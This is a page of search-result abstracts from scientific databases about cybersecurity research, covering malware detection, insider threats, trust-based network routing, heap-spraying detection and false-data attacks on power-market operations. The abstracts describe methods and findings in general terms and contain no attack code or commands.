  11. Countermeasures for Time-Cheat Detection in Multiplayer Online Games

    NASA Astrophysics Data System (ADS)

    Ferretti, Stefano

    Cheating is an important issue in games. Depending on the system over which the game is deployed, several types of malicious actions may be accomplished so as to take an unfair and unexpected advantage over the game and over the (digital, human) adversaries. When the game is a standalone application, cheats typically just relate to the specific software code developed to build the application. It is not a surprise to find (on the Web and in specialized magazines) people who explain cheats for specific games, stating, for instance, which configuration files can be altered (and how to do it) to automatically gain some bonus during the game. To avoid this, game developers are hence motivated to build stable code, with related data that should be securely managed and made difficult to alter.

  12. A Novel Malware Target Recognition Architecture for Enhanced Cyberspace Situation Awareness

    DTIC Science & Technology

    2011-09-01

    3.1 Chapter Overview ... 3.2 CRISP-DM Process ... 3.3 Execution of the CRISP-DM Process ... 10. Adaptation of CRISP-DM process (from [13]) ... 11. Comparison of detection

  13. Job Analysis Results for Malicious-Code Reverse Engineers: A Case Study

    DTIC Science & Technology

    2014-05-01

    Testing in Personnel Selection: Contemporary Issues in Cognitive Ability and Personality Testing." Journal of Business Inquiry: Research, Education, and... federally funded research and development center. Any opinions, findings and conclusions or recommendations expressed in this material are those of... predict the development of expertise is important. Currently, job analysis research on teams of malicious-code reverse engineers is lacking. Therefore

  14. T2AR: trust-aware ad-hoc routing protocol for MANET.

    PubMed

    Dhananjayan, Gayathri; Subbiah, Janakiraman

    2016-01-01

    Secure data transfer against malicious attacks is an important issue in an infrastructure-less independent network called a mobile ad-hoc network (MANET). Trust assurance between MANET nodes is the key parameter for high-security provision under dynamic topology variations and open wireless constraints. However, the malicious behavior of nodes reduces the trust level of the nodes, which leads to insecure data delivery. The increase in malicious attacks causes excessive energy consumption, which leads to a reduction of network lifetime. The lack of positional information updates of the nodes in the ad-hoc on-demand vector (AODV) protocol during connection establishment offers a lower trust level between the nodes. Hence, trust rate computation using energy and mobility models, and its update, are the essential tasks for secure data delivery. This paper proposes a trust-aware ad-hoc routing (T2AR) protocol to improve the trust level between the nodes in a MANET. The proposed method modifies the traditional AODV routing protocol with the constraints of trust rate, energy, and mobility-based malicious behavior prediction. Packet sequence ID matching from the log reports of neighbor nodes determines the trust rate, which avoids malicious report generation. Besides, the use of direct and indirect trust observation schemes increases the trust level, and the received signal strength indicator determines whether the trusted node is within communication range or not. The comparative analysis between the proposed T2AR and the existing methods such as TRUNCMAN, RBT, GR, FBR and DICOTIDS regarding average end-to-end delay, throughput, false positives and packet delivery ratio shows the effectiveness of T2AR in secure MANET environment design.

  15. Game Theory Meets Wireless Sensor Networks Security Requirements and Threats Mitigation: A Survey.

    PubMed

    Abdalzaher, Mohamed S; Seddik, Karim; Elsabrouty, Maha; Muta, Osamu; Furukawa, Hiroshi; Abdel-Rahman, Adel

    2016-06-29

    We present a study of using game theory for protecting wireless sensor networks (WSNs) from selfish behavior or malicious nodes. Due to scalability, low complexity and disseminated nature of WSNs, malicious attacks can be modeled effectively using game theory. In this study, we survey the different game-theoretic defense strategies for WSNs. We present a taxonomy of the game theory approaches based on the nature of the attack, whether it is caused by an external attacker or it is the result of an internal node acting selfishly or maliciously. We also present a general trust model using game theory for decision making. We, finally, identify the significant role of evolutionary games for WSNs security against intelligent attacks; then, we list several prospect applications of game theory to enhance the data trustworthiness and node cooperation in different WSNs.

  16. New Technologies and Emerging Threats: Personnel Security Adjudicative Guidelines in the Age of Social Networking

    DTIC Science & Technology

    2012-12-01

    behavior unless it becomes criminal or involves the publishing of sensitive information. This means that malicious doxing, cyberbullying or other... workplace or background investigation realms, as well as the many forms of cyberbullying and malicious rumor-spreading online could be addressed. Doxing... None Sexually harass another person online None Engage in cyberbullying by using the Internet to send offensive, inappropriate verbal attack

  17. Insider Threat Detection on the Windows Operating System using Virtual Machine Introspection

    DTIC Science & Technology

    2012-06-14

    by a malicious insider. HBSS systems running on a user's workstation could be disabled either due to misconfiguration, privilege escalation, or by a... potential malicious insider threat, organizations must develop use cases which categorize possible attack techniques, such as data exfiltration via... hardware and contain any type of data an attacker may be looking for. Minimal Resources Since honeypots do not provide any network services, they

  18. Detecting Malicious Tweets in Twitter Using Runtime Monitoring With Hidden Information

    DTIC Science & Technology

    2016-06-01

    text mining using Twitter streaming API and python [Online]. Available: http://adilmoujahid.com/posts/2014/07/twitter-analytics/ [22] M. Singh, B... sites with 645,750,000 registered users [3] and has open source public tweets for data mining. 2. Malicious Users and Tweets In the modern world... want to data mine in Twitter, and presents the natural language assertions and corresponding rule patterns. It then describes the steps performed using

  19. Using Trust to Establish a Secure Routing Model in Cognitive Radio Network.

    PubMed

    Zhang, Guanghua; Chen, Zhenguo; Tian, Liqin; Zhang, Dongwen

    2015-01-01

    Specific to the selective forwarding attack on routing in cognitive radio networks, this paper proposes a trust-based secure routing model. By monitoring nodes' forwarding behaviors, node trusts are constructed to identify malicious nodes. Since a routing-selection-based model must cooperate closely with spectrum allocation, a route request piggybacking available spectrum opportunities is sent to non-malicious nodes. In the routing decision phase, node trusts are used to construct available path trusts, and delay measurement is combined with them for making routing decisions. At the same time, according to the trust classification, different responses are made to the nodes' service requests. By adopting stricter punishment of malicious behaviors from non-trusted nodes, the cooperation of nodes in routing can be stimulated. Simulation results and analysis indicate that this model has good performance in network throughput and end-to-end delay under the selective forwarding attack.

  20. Game Theory Meets Wireless Sensor Networks Security Requirements and Threats Mitigation: A Survey

    PubMed Central

    Abdalzaher, Mohamed S.; Seddik, Karim; Elsabrouty, Maha; Muta, Osamu; Furukawa, Hiroshi; Abdel-Rahman, Adel

    2016-01-01

    We present a study of using game theory for protecting wireless sensor networks (WSNs) from selfish behavior or malicious nodes. Due to scalability, low complexity and disseminated nature of WSNs, malicious attacks can be modeled effectively using game theory. In this study, we survey the different game-theoretic defense strategies for WSNs. We present a taxonomy of the game theory approaches based on the nature of the attack, whether it is caused by an external attacker or it is the result of an internal node acting selfishly or maliciously. We also present a general trust model using game theory for decision making. We, finally, identify the significant role of evolutionary games for WSNs security against intelligent attacks; then, we list several prospect applications of game theory to enhance the data trustworthiness and node cooperation in different WSNs. PMID:27367700

  1. A Mechanism to Avoid Collusion Attacks Based on Code Passing in Mobile Agent Systems

    NASA Astrophysics Data System (ADS)

    Jaimez, Marc; Esparza, Oscar; Muñoz, Jose L.; Alins-Delgado, Juan J.; Mata-Díaz, Jorge

    Mobile agents are software entities consisting of code, data, state and itinerary that can migrate autonomously from host to host executing their code. Despite its benefits, security issues strongly restrict the use of code mobility. The protection of mobile agents against the attacks of malicious hosts is considered the most difficult security problem to solve in mobile agent systems. In particular, collusion attacks have been barely studied in the literature. This paper presents a mechanism that avoids collusion attacks based on code passing. Our proposal is based on a Multi-Code agent, which contains a different variant of the code for each host. A Trusted Third Party is responsible for providing the information to extract its own variant to the hosts, and for taking trusted timestamps that will be used to verify time coherence.

  2. Network Security Validation Using Game Theory

    NASA Astrophysics Data System (ADS)

    Papadopoulou, Vicky; Gregoriades, Andreas

    Non-functional requirements (NFR) such as network security have recently gained widespread attention in distributed information systems. Despite their importance, however, there is no systematic approach to validate these requirements given the complexity and uncertainty characterizing modern networks. Traditionally, network security requirements specification has been the result of a reactive process. This, however, limited the immunity property of the distributed systems that depended on these networks. Security requirements specification needs a proactive approach. Network infrastructure is constantly under attack by hackers and malicious software that aim to break into computers. To combat these threats, network designers need sophisticated security validation techniques that will guarantee a minimum level of security for their future networks. This paper presents a game-theoretic approach to security requirements validation. An introduction to game theory is presented along with an example that demonstrates the application of the approach.

  3. Cyber War: The Next Frontier for NATO

    DTIC Science & Technology

    2015-03-01

    cyber-attacks as a way to advance their agenda. Common examples of cyber-attacks include computer viruses, worms, malware, and distributed denial of... take advantage of security holes and cause damage to computer systems, steal financial data, or acquire sensitive secrets. As technology becomes

  4. Sensor Based Framework for Secure Multimedia Communication in VANET

    PubMed Central

    Rahim, Aneel; Khan, Zeeshan Shafi; Bin Muhaya, Fahad T.; Sher, Muhammad; Kim, Tai-Hoon

    2010-01-01

    Secure multimedia communication enhances the safety of passengers by providing visual pictures of accidents and dangerous situations. In this paper we propose a framework for secure multimedia communication in Vehicular Ad-Hoc Networks (VANETs). Our proposed framework is mainly divided into four components: redundant information, priority assignment, malicious data verification and malicious node verification. The proposed scheme has been validated with the help of the NS-2 network simulator and the Evalvid tool. PMID:22163462

  5. Health care, an easy target, needs to get its guard up.

    PubMed

    Ladika, Susan

    2016-12-01

    Health care ranked ninth in terms of its cybersecurity in a recent report by SecurityScorecard, a company that provides risk monitoring and security ratings. The health care industry is widely infected with malware and has come under repeated ransomware attacks.

  6. Stop Sleazeware

    ERIC Educational Resources Information Center

    Reynolds, Ben

    2005-01-01

    "Sleazeware" is the authors' term for spyware, adware, malware, trackware, foistware, trojans, and other programs that sleaze into computers, either as a hidden component or by tricking someone into downloading them. Once in the machine, the program phones home for purposes ranging from simply reporting where people browse to downloading…

  7. Hardware Support for Malware Defense and End-to-End Trust

    DTIC Science & Technology

    2017-02-01

    IoT) sensors and actuators, mobile devices and servers; cloud based, stand alone, and traditional mainframes. The prototype developed demonstrated... virtual machines. For mobile platforms we developed and prototyped an architecture supporting separation of personalities on the same platform... 3.1. MOBILE

  8. Automatic Identification of Critical Data Items in a Database to Mitigate the Effects of Malicious Insiders

    NASA Astrophysics Data System (ADS)

    White, Jonathan; Panda, Brajendra

    A major concern for computer system security is the threat from malicious insiders who target and abuse critical data items in the system. In this paper, we propose a solution to enable automatic identification of critical data items in a database by way of data dependency relationships. This identification of critical data items is necessary because insider threats often target mission critical data in order to accomplish malicious tasks. Unfortunately, currently available systems fail to address this problem in a comprehensive manner. It is more difficult for non-experts to identify these critical data items because of their lack of familiarity and due to the fact that data systems are constantly changing. By identifying the critical data items automatically, security engineers will be better prepared to protect what is critical to the mission of the organization and also have the ability to focus their security efforts on these critical data items. We have developed an algorithm that scans the database logs and forms a directed graph showing which items influence a large number of other items and at what frequency this influence occurs. This graph is traversed to reveal the data items which have a large influence throughout the database system by using a novel metric based formula. These items are critical to the system because if they are maliciously altered or stolen, the malicious alterations will spread throughout the system, delaying recovery and causing a much more malignant effect. As these items have significant influence, they are deemed to be critical and worthy of extra security measures. Our proposal is not intended to replace existing intrusion detection systems, but rather is intended to complement current and future technologies. Our proposal has never been performed before, and our experimental results have shown that it is very effective in revealing critical data items automatically.

  9. Test and Evaluation of the Malicious Activity Simulation Tool (MAST) in a Local Area Network (LAN) Running the Common PC Operating System Environment (COMPOSE)

    DTIC Science & Technology

    2013-09-01

    Malicious Activity Simulation Tool MMORPG Massively Multiplayer Online Role-Playing Game MMS Mission Management Server MOA Memorandum of Agreement MS...conferencing, and massively multiplayer online role- playing games (MMORPG). During all of these Internet-based exchanges and transactions, the Internet user...In its 2011 Internet Crime Report, the Internet Crime Complaint Center (IC3) stated there were more than 300,000 complaints of online criminal

  10. A prototype forensic toolkit for industrial-control-systems incident response

    NASA Astrophysics Data System (ADS)

    Carr, Nickolas B.; Rowe, Neil C.

    2015-05-01

    Industrial control systems (ICSs) are an important part of critical infrastructure in cyberspace. They are especially vulnerable to cyber-attacks because of their legacy hardware and software and the difficulty of changing it. We first survey the history of intrusions into ICSs, the more serious of which involved a continuing adversary presence on an ICS network. We discuss some common vulnerabilities and the categories of possible attacks, noting the frequent use of software written a long time ago. We propose a framework for designing ICS incident response under the constraints that no new software must be required and that interventions cannot impede the continuous processing that is the norm for such systems. We then discuss a prototype toolkit we built using the Windows Management Instrumentation Command-Line tool for host-based analysis and the Bro intrusion-detection software for network-based analysis. Particularly useful techniques we used were learning the historical range of parameters of numeric quantities so as to recognize anomalies, learning the usual addresses of connections to a node, observing Internet addresses (usually rare), observing anomalous network protocols such as unencrypted data transfers, observing unusual scheduled tasks, and comparing key files through registry entries and hash values to find malicious modifications. We tested our methods on actual data from ICSs including publicly-available data, voluntarily-submitted data, and researcher-provided "advanced persistent threat" data. We found instances of interesting behavior in our experiments. Intrusions were generally easy to see because of the repetitive nature of most processing on ICSs, but operators need to be motivated to look.

  11. Analytical Characterization of Internet Security Attacks

    ERIC Educational Resources Information Center

    Sellke, Sarah H.

    2010-01-01

    Internet security attacks have drawn significant attention due to their enormously adverse impact. These attacks include Malware (Viruses, Worms, Trojan Horses), Denial of Service, Packet Sniffer, and Password Attacks. There is an increasing need to provide adequate defense mechanisms against these attacks. My thesis proposal deals with analytical…

  12. Radio Frequency Based Programmable Logic Controller Anomaly Detection

    DTIC Science & Technology

    2013-09-01

    include wireless radios, IEEE 802.15 Bluetooth devices, cellular phones, and IEEE 802.11 WiFi networking devices. While wireless communication... MacKenzie, H. Shamoon Malware and SCADA Security: What are the Impacts? Technical Report, Tofino Security, Sep 2012. 61. Mateti, P. Hacking Techniques

  13. Spear Phishing Attack Detection

    DTIC Science & Technology

    2011-03-24

    the insider amongst senior leaders of an organization [Mes08], the undercover detective within a drug cartel, or the classic secret agent planted in...to a mimicry attack that shapes the embedded malware to have a statistical distribution similar to "normal" or benign behavior. 2.3.1.3

  14. A two-stage flow-based intrusion detection model for next-generation networks.

    PubMed

    Umer, Muhammad Fahad; Sher, Muhammad; Bi, Yaxin

    2018-01-01

    The next-generation network provides state-of-the-art access-independent services over converged mobile and fixed networks. Security in the converged network environment is a major challenge. Traditional packet and protocol-based intrusion detection techniques cannot be used in next-generation networks due to slow throughput, low accuracy and their inability to inspect encrypted payload. An alternative solution for protection of next-generation networks is to use network flow records for detection of malicious activity in the network traffic. The network flow records are independent of access networks and user applications. In this paper, we propose a two-stage flow-based intrusion detection system for next-generation networks. The first stage uses an enhanced unsupervised one-class support vector machine which separates malicious flows from normal network traffic. The second stage uses a self-organizing map which automatically groups malicious flows into different alert clusters. We validated the proposed approach on two flow-based datasets and obtained promising results.

  15. A two-stage flow-based intrusion detection model for next-generation networks

    PubMed Central

    2018-01-01

    The next-generation network provides state-of-the-art access-independent services over converged mobile and fixed networks. Security in the converged network environment is a major challenge. Traditional packet and protocol-based intrusion detection techniques cannot be used in next-generation networks due to slow throughput, low accuracy and their inability to inspect encrypted payload. An alternative solution for protection of next-generation networks is to use network flow records for detection of malicious activity in the network traffic. The network flow records are independent of access networks and user applications. In this paper, we propose a two-stage flow-based intrusion detection system for next-generation networks. The first stage uses an enhanced unsupervised one-class support vector machine which separates malicious flows from normal network traffic. The second stage uses a self-organizing map which automatically groups malicious flows into different alert clusters. We validated the proposed approach on two flow-based datasets and obtained promising results. PMID:29329294

  16. A Learning System for Discriminating Variants of Malicious Network Traffic

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beaver, Justin M; Symons, Christopher T; Gillen, Rob

    Modern computer network defense systems rely primarily on signature-based intrusion detection tools, which generate alerts when patterns that are pre-determined to be malicious are encountered in network data streams. Signatures are created reactively, and only after in-depth manual analysis of a network intrusion. There is little ability for signature-based detectors to identify intrusions that are new or even variants of an existing attack, and little ability to adapt the detectors to the patterns unique to a network environment. Due to these limitations, the need exists for network intrusion detection techniques that can more comprehensively address both known and unknown network-based attacks and can be optimized for the target environment. This work describes a system that leverages machine learning to provide a network intrusion detection capability that analyzes behaviors in channels of communication between individual computers. Using examples of malicious and non-malicious traffic in the target environment, the system can be trained to discriminate between traffic types. The machine learning provides insight that would be difficult for a human to explicitly code as a signature because it evaluates many interdependent metrics simultaneously. With this approach, zero-day detection is possible by focusing on similarity to known traffic types rather than mining for specific bit patterns or conditions. This also reduces the burden on organizations to account for all possible attack variant combinations through signatures. The approach is presented along with results from a third-party evaluation of its performance.

  17. Securing Collaborative Spectrum Sensing against Untrustworthy Secondary Users in Cognitive Radio Networks

    NASA Astrophysics Data System (ADS)

    Wang, Wenkai; Li, Husheng; Sun, Yan(Lindsay); Han, Zhu

    2009-12-01

    Cognitive radio is a revolutionary paradigm to mitigate the spectrum scarcity problem in wireless networks. In cognitive radio networks, collaborative spectrum sensing is considered an effective method to improve the performance of primary user detection. Current collaborative spectrum sensing schemes usually assume that secondary users report their sensing information honestly. However, compromised nodes can send false sensing information to mislead the system. In this paper, we study the detection of untrustworthy secondary users in cognitive radio networks. We first analyze the case in which there is only one compromised node in the collaborative spectrum sensing scheme. Then we investigate the scenario in which there are multiple compromised nodes. Defense schemes are proposed to detect malicious nodes according to their reporting histories. We calculate the suspicious level of all nodes based on their reports. The reports from nodes with high suspicious levels are excluded from decision-making. Compared with existing defense methods, the proposed scheme can effectively differentiate malicious nodes from honest nodes. As a result, it can significantly improve the performance of collaborative sensing. For example, when there are 10 secondary users, with the primary user detection rate being equal to 0.99, one malicious user can make the false alarm rate increase to 72%. The proposed scheme can reduce it to 5%. Two malicious users can make the false alarm rate increase to 85%, and the proposed scheme reduces it to 8%.

  18. SCADA Protocol Anomaly Detection Utilizing Compression (SPADUC) 2013

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gordon Rueff; Lyle Roybal; Denis Vollmer

    2013-01-01

    There is a significant need to protect the nation’s energy infrastructures from malicious actors using cyber methods. Supervisory, Control, and Data Acquisition (SCADA) systems may be vulnerable due to the insufficient security implemented during the design and deployment of these control systems. This is particularly true in older legacy SCADA systems that are still commonly in use. The purpose of INL’s research on the SCADA Protocol Anomaly Detection Utilizing Compression (SPADUC) project was to determine if and how data compression techniques could be used to identify and protect SCADA systems from cyber attacks. Initially, the concept was centered on how to train a compression algorithm to recognize normal control system traffic versus hostile network traffic. Because large portions of the TCP/IP message traffic (called packets) are repetitive, the concept of using compression techniques to differentiate “non-normal” traffic was proposed. In this manner, malicious SCADA traffic could be identified at the packet level prior to completing its payload. Previous research has shown that SCADA network traffic has traits desirable for compression analysis. This work investigated three different approaches to identify malicious SCADA network traffic using compression techniques. The preliminary analyses and results presented herein are clearly able to differentiate normal from malicious network traffic at the packet level at a very high confidence level for the conditions tested. Additionally, the master dictionary approach used in this research appears to initially provide a meaningful way to categorize and compare packets within a communication channel.

  19. Realization and optimization of AES algorithm on the TMS320DM6446 based on DaVinci technology

    NASA Astrophysics Data System (ADS)

    Jia, Wen-bin; Xiao, Fu-hai

    2013-03-01

    The application of the AES algorithm in a digital cinema system prevents illegal theft or malicious tampering of video data, and solves its security problems. At the same time, in order to meet the requirements for real-time, on-site and transparent encryption of high-speed audio and video data streams in the information security field, and based on an in-depth analysis of the AES algorithm principle, the TMS320DM6446 hardware platform and the DaVinci software framework, this paper proposes specific methods for realizing the AES algorithm in a digital video system and solutions for optimizing it. The test results show that digital movies encrypted with AES-128 cannot play normally, which ensures the security of digital movies. By comparing the performance of the AES-128 algorithm before and after optimization, the correctness and validity of the improved algorithm are verified.

  20. Battlefield of the Future: How to Achieve Superiority in the Cyberspace Domain

    DTIC Science & Technology

    2016-02-01

    the information. Spamming is sending unsolicited email advertising for services, products and websites used as a delivery mechanism for malware and...other cyber threats. Spoofing is generating a fake website to impersonate a real website run by a different party. Email spoofing 11 is altering

  1. Developing a Qualia-Based Multi-Agent Architecture for Use in Malware Detection

    DTIC Science & Technology

    2010-03-01

    executables were correctly classified with a 6% false positive rate [7]. Kolter and Maloof expand Schultz’s work by analyzing different...Proceedings of the 2001 IEEE Symposium on Security and Privacy. Los Alamitos, CA: IEEE Computer Society, 2001. [8] J. Z. Kolter and M. A. Maloof

  2. The ZeroAccess Auto-Clicking and Search-Hijacking Click Fraud Modules

    DTIC Science & Technology

    2013-12-16

    payloads and instead began distributing Bitcoin miners and click fraud modules.3 From a technical perspective, the primary click fraud malware used in...this era operated in the indiscriminate “auto-clicking” fashion we describe in Section 5. Alongside the click fraud and Bitcoin payloads, ZeroAccess

  3. The (Campus) Empire Strikes Back

    ERIC Educational Resources Information Center

    Archibald, Fred

    2008-01-01

    When it comes to anti-malware protection, today's university IT departments have their work cut out for them. Network managers must walk the fine line between enabling a highly collaborative, non-restrictive environment, and ensuring the confidentiality, integrity, and availability of data and computing resources. This is no easy task, especially…

  4. An Assessment of the Department of Defense Strategy for Operating in Cyberspace

    DTIC Science & Technology

    2013-09-01

    were responsible for developing the Stuxnet malware aimed at sabotaging the Natanz uranium enrichment plant in Iran.66 Stuxnet spread through the...and Detection for the Twenty-First Century, Upper Saddle River, NJ: Addison Wesley, 2009. 36. Ronald Krutz and Russell Vines, Cloud Security: a

  5. Mining and Indexing Graph Databases

    ERIC Educational Resources Information Center

    Yuan, Dayu

    2013-01-01

    Graphs are widely used to model structures and relationships of objects in various scientific and commercial fields. Chemical molecules, proteins, malware system-call dependencies and three-dimensional mechanical parts are all modeled as graphs. In this dissertation, we propose to mine and index those graph data to enable fast and scalable search.…

  6. Using OpenSSH to secure mobile LAN network traffic

    NASA Astrophysics Data System (ADS)

    Luu, Brian B.; Gopaul, Richard D.

    2002-08-01

    Mobile Internet Protocol (IP) Local Area Network (LAN) is a technique, developed by the U.S. Army Research Laboratory, which allows a LAN to be IP mobile when attaching to a foreign IP-based network and using this network as a means to retain connectivity to its home network. In this paper, we describe a technique that uses Open Secure Shell (OpenSSH) software to ensure secure, encrypted transmission of a mobile LAN's network traffic. Whenever a mobile LAN, implemented with Mobile IP LAN, moves to a foreign network, its gateway (router) obtains an IP address from the new network. IP tunnels, using IP encapsulation, are then established from the gateway through the foreign network to a home agent on its home network. These tunnels provide a virtual two-way connection to the home network for the mobile LAN as if the LAN were connected directly to its home network. Hence, when IP mobile, a mobile LAN's tunneled network traffic must traverse one or more foreign networks that may not be trusted. This traffic could be subject to eavesdropping, interception, modification, or redirection by malicious nodes in these foreign networks. To protect network traffic passing through the tunnels, OpenSSH is used as a means of encryption because it prevents surveillance, modification, and redirection of mobile LAN traffic passing across foreign networks. Since the software is found in the public domain, is available for most current operating systems, and is commonly used to provide secure network communications, OpenSSH is the software of choice.

  7. Detecting Heap-Spraying Code Injection Attacks in Malicious Web Pages Using Runtime Execution

    NASA Astrophysics Data System (ADS)

    Choi, Younghan; Kim, Hyoungchun; Lee, Donghoon

    The growing use of web services is increasing web browser attacks exponentially. Most attacks use a technique called heap spraying because of its high success rate. Heap spraying executes malicious code without needing the exact address of the code, by copying it into many heap objects. For this reason, the attack has a high chance of succeeding once the vulnerability is exploited. Thus, attackers have recently begun using this technique because it is easy to use JavaScript to allocate the heap memory area. This paper proposes a novel technique that detects heap spraying attacks by executing a heap object in a real environment, irrespective of the version and patch status of the web browser. This runtime execution is used to detect various forms of heap spraying attacks, such as encoding and polymorphism. Heap objects are executed after being filtered on the basis of patterns of heap spraying attacks in order to reduce the overhead of the runtime execution. Patterns of heap spraying attacks are based on analysis of how a web browser accesses benign web sites. The heap objects are executed forcibly by changing the instruction register to their address after they have been loaded into memory. Thus, we can execute the malicious code without having to consider the version and patch status of the browser. An object is considered to contain malicious code if the execution reaches a call instruction and that instruction accesses the API of system libraries, such as kernel32.dll and ws_32.dll. To change registers and monitor execution flow, we used a debugger engine. A prototype, named HERAD (HEap spRAying Detector), is implemented and evaluated. In experiments, HERAD detects various forms of exploit code that an emulation cannot detect, and some heap spraying attacks that NOZZLE cannot detect. Although it has an execution overhead, HERAD produces a low number of false alarms. The processing time of several minutes is negligible because our research focuses on detecting heap spraying. This research can be applied to existing systems that collect malicious code, such as honeypots.

  8. Identifying and Embedding Common Indicators of Compromise in Virtual Machines for Lab-Based Incident Response Education

    DTIC Science & Technology

    2015-09-01

    resistant to an attack. However, with techniques and motives ever-changing, it is not realistic to think that any organization is immune to threat...Berkeley, CA: McGraw- Hill/Osborne. Sikorski, M., & Honig, A. (2012). Practical malware analysis. San Francisco: No Starch Press. Skoudis, E

  9. Malware Memory Analysis for Non specialists: Investigating Publicly Available Memory Images for Prolaco and SpyEye

    DTIC Science & Technology

    2013-10-01

    1_doc_RCData_612|virus|Trojan|rootkit|worm|Prolaco|rundll|msiexec|google|wmimngr|jusche d|wfmngr|wupmgr| java |wpmgr|nvscpapisvr)’ ” results in the...hashdump Dumps passwords hashes (LM/NTLM) from memory hibinfo Dump hibernation file information hivedump Prints out a hive hivelist Print list of

  10. A Hybrid Computing Testbed for Mobile Threat Detection and Enhanced Research and Education in Information

    DTIC Science & Technology

    2014-11-20

    techniques to defend against stealthy malware, i.e., rootkits. For example, we have been developing new virtualization-based security service called AirBag ...for mobile devices. AirBag is a virtualization-based system that enables dynamic switching of (guest) Android images in one VM, with one image

  11. Examining the Relationship of Business Operations and the Information Security Culture in the United States

    ERIC Educational Resources Information Center

    Wynn, Cynthia L.

    2017-01-01

    An increase in information technology has caused an increase in threats to information security. Threats include malware, viruses, sabotage by employees, and hacking into computer systems. Organizations have to find new ways to combat internal and external vulnerabilities and threats to protect their information security and…

  12. 77 FR 16229 - Announcement of Requirements and Registration for the “2012 ASPR Challenge Titled Now Trending...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-03-20

    ... that their submission is free of malware. Each Contestant also warrants that he or she has complied..., royalty-free nonexclusive worldwide license to post, link to, share, and display publicly the submission... to ASPR an irrevocable, paid-up, royalty-free nonexclusive worldwide license to use winning...

  13. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Jason L. Wright; Milos Manic

    Finding and identifying cryptography is a growing concern in the malware analysis community. In this paper, artificial neural networks are used to classify functional blocks from a disassembled program as being either cryptography related or not. The resulting system, referred to as NNLC (Neural Net for Locating Cryptography) is presented and results of applying this system to various libraries are described.

  14. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Jason L. Wright

    Finding and identifying cryptography is a growing concern in the malware analysis community. In this paper, a heuristic method for determining the likelihood that a given function contains a cryptographic algorithm is discussed, and the results of applying this method in various environments are shown. The algorithm is based on frequency analysis of the opcodes that make up each function within a binary.

  15. 75 FR 14429 - Agency Information Collection Activities; Submission for Office of Management and Budget Review...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-03-25

    ... regular security audits and have been certified for operation. The CPSC observes all industry and Federal government best practices for network security. CPSC staff regularly analyzes its systems for vulnerabilities and malware, and monitor the network for real-time intrusion attempts. B. Estimated Burden The CPSC...

  16. Adversarial Feature Selection Against Evasion Attacks.

    PubMed

    Zhang, Fei; Chan, Patrick P K; Biggio, Battista; Yeung, Daniel S; Roli, Fabio

    2016-03-01

    Pattern recognition and machine learning techniques have been increasingly adopted in adversarial settings such as spam, intrusion, and malware detection, although their security against well-crafted attacks that aim to evade detection by manipulating data at test time has not yet been thoroughly assessed. While previous work has been mainly focused on devising adversary-aware classification algorithms to counter evasion attempts, only few authors have considered the impact of using reduced feature sets on classifier security against the same attacks. An interesting, preliminary result is that classifier security to evasion may be even worsened by the application of feature selection. In this paper, we provide a more detailed investigation of this aspect, shedding some light on the security properties of feature selection against evasion attacks. Inspired by previous work on adversary-aware classifiers, we propose a novel adversary-aware feature selection model that can improve classifier security against evasion attacks, by incorporating specific assumptions on the adversary's data manipulation strategy. We focus on an efficient, wrapper-based implementation of our approach, and experimentally validate its soundness on different application examples, including spam and malware detection.

  17. Can genetic algorithms help virus writers reshape their creations and avoid detection?

    NASA Astrophysics Data System (ADS)

    Abu Doush, Iyad; Al-Saleh, Mohammed I.

    2017-11-01

    Different attack and defence techniques have evolved over time as actions and reactions between the black-hat and white-hat communities. Encryption, polymorphism, metamorphism and obfuscation are among the techniques used by attackers to bypass security controls. On the other hand, pattern matching, algorithmic scanning, emulation and heuristics are used by the defence team. The Antivirus (AV) is a vital security control that is used against a variety of threats. The AV mainly scans data against its database of virus signatures. Basically, it claims a virus if a match is found. This paper seeks to find the minimal possible changes that can be made to a virus so that it will appear normal when scanned by the AV. Brute-force search through all possible changes can be a computationally expensive task. Alternatively, this paper tries to apply a Genetic Algorithm to solving such a problem. Our proposed algorithm is tested on seven different malware instances. The results show that in all the tested malware instances only a small change in each instance was enough to bypass the AV.

  18. A framework for analyzing the impact of data integrity/quality on electricity market operations

    NASA Astrophysics Data System (ADS)

    Choi, Dae Hyun

    This dissertation examines the impact of data integrity/quality in the supervisory control and data acquisition (SCADA) system on real-time locational marginal price (LMP) in electricity market operations. Measurement noise and/or manipulated sensor errors in a SCADA system may mislead system operators about real-time conditions in a power system, which, in turn, may impact the price signals in real-time power markets. This dissertation serves as a first attempt to analytically investigate the impact of bad/malicious data on electric power market operations. In future power system operations, which will probably involve many more sensors, the impact of sensor data integrity/quality on grid operations will become increasingly important. The first part of this dissertation studies, from a market participant's perspective, a new class of malicious data attacks on state estimation, which subsequently influence the result of the newly emerging look-ahead dispatch models in the real-time power market. In comparison with prior work on cyber-attacks on static dispatch, where no inter-temporal ramping constraint is considered, we propose a novel attack strategy, named ramp-induced data (RID) attack, with which the attacker can manipulate the limits of the ramp constraints of generators in look-ahead dispatch. It is demonstrated that the proposed attack can lead to financial profits via malicious capacity withholding of selected generators, while remaining undetected by the existing bad data detection algorithm embedded in today's state estimation software. In the second part, we investigate, from a system operator's perspective, the sensitivity of locational marginal price (LMP) with respect to data corruption-induced state estimation error in the real-time power market. Two data corruption scenarios are considered: corrupted continuous data (e.g., the power injection/flow and voltage magnitude) falsify the power flow estimate, whereas corrupted discrete data (e.g., the on/off status of a circuit breaker) falsify the network topology estimate, in both cases leading to the distortion of LMP. We present an analytical framework to quantify real-time LMP sensitivity subject to continuous and discrete data corruption via state estimation. The proposed framework offers system operators an analytical tool to identify buses and transmission lines that are economically sensitive to data corruption, as well as to find sensors that impact LMP changes significantly. This dissertation serves as a first step towards a rigorous understanding of the fundamental coupling among the cyber, physical and economic layers of operations in the future smart grid.

  19. Tumor Microenvironment Modulation via Gold Nanoparticles Targeting Malicious Exosomes: Implications for Cancer Diagnostics and Therapy

    PubMed Central

    Roma-Rodrigues, Catarina; Raposo, Luís R.; Cabral, Rita; Paradinha, Fabiana; Baptista, Pedro V.; Fernandes, Alexandra R.

    2017-01-01

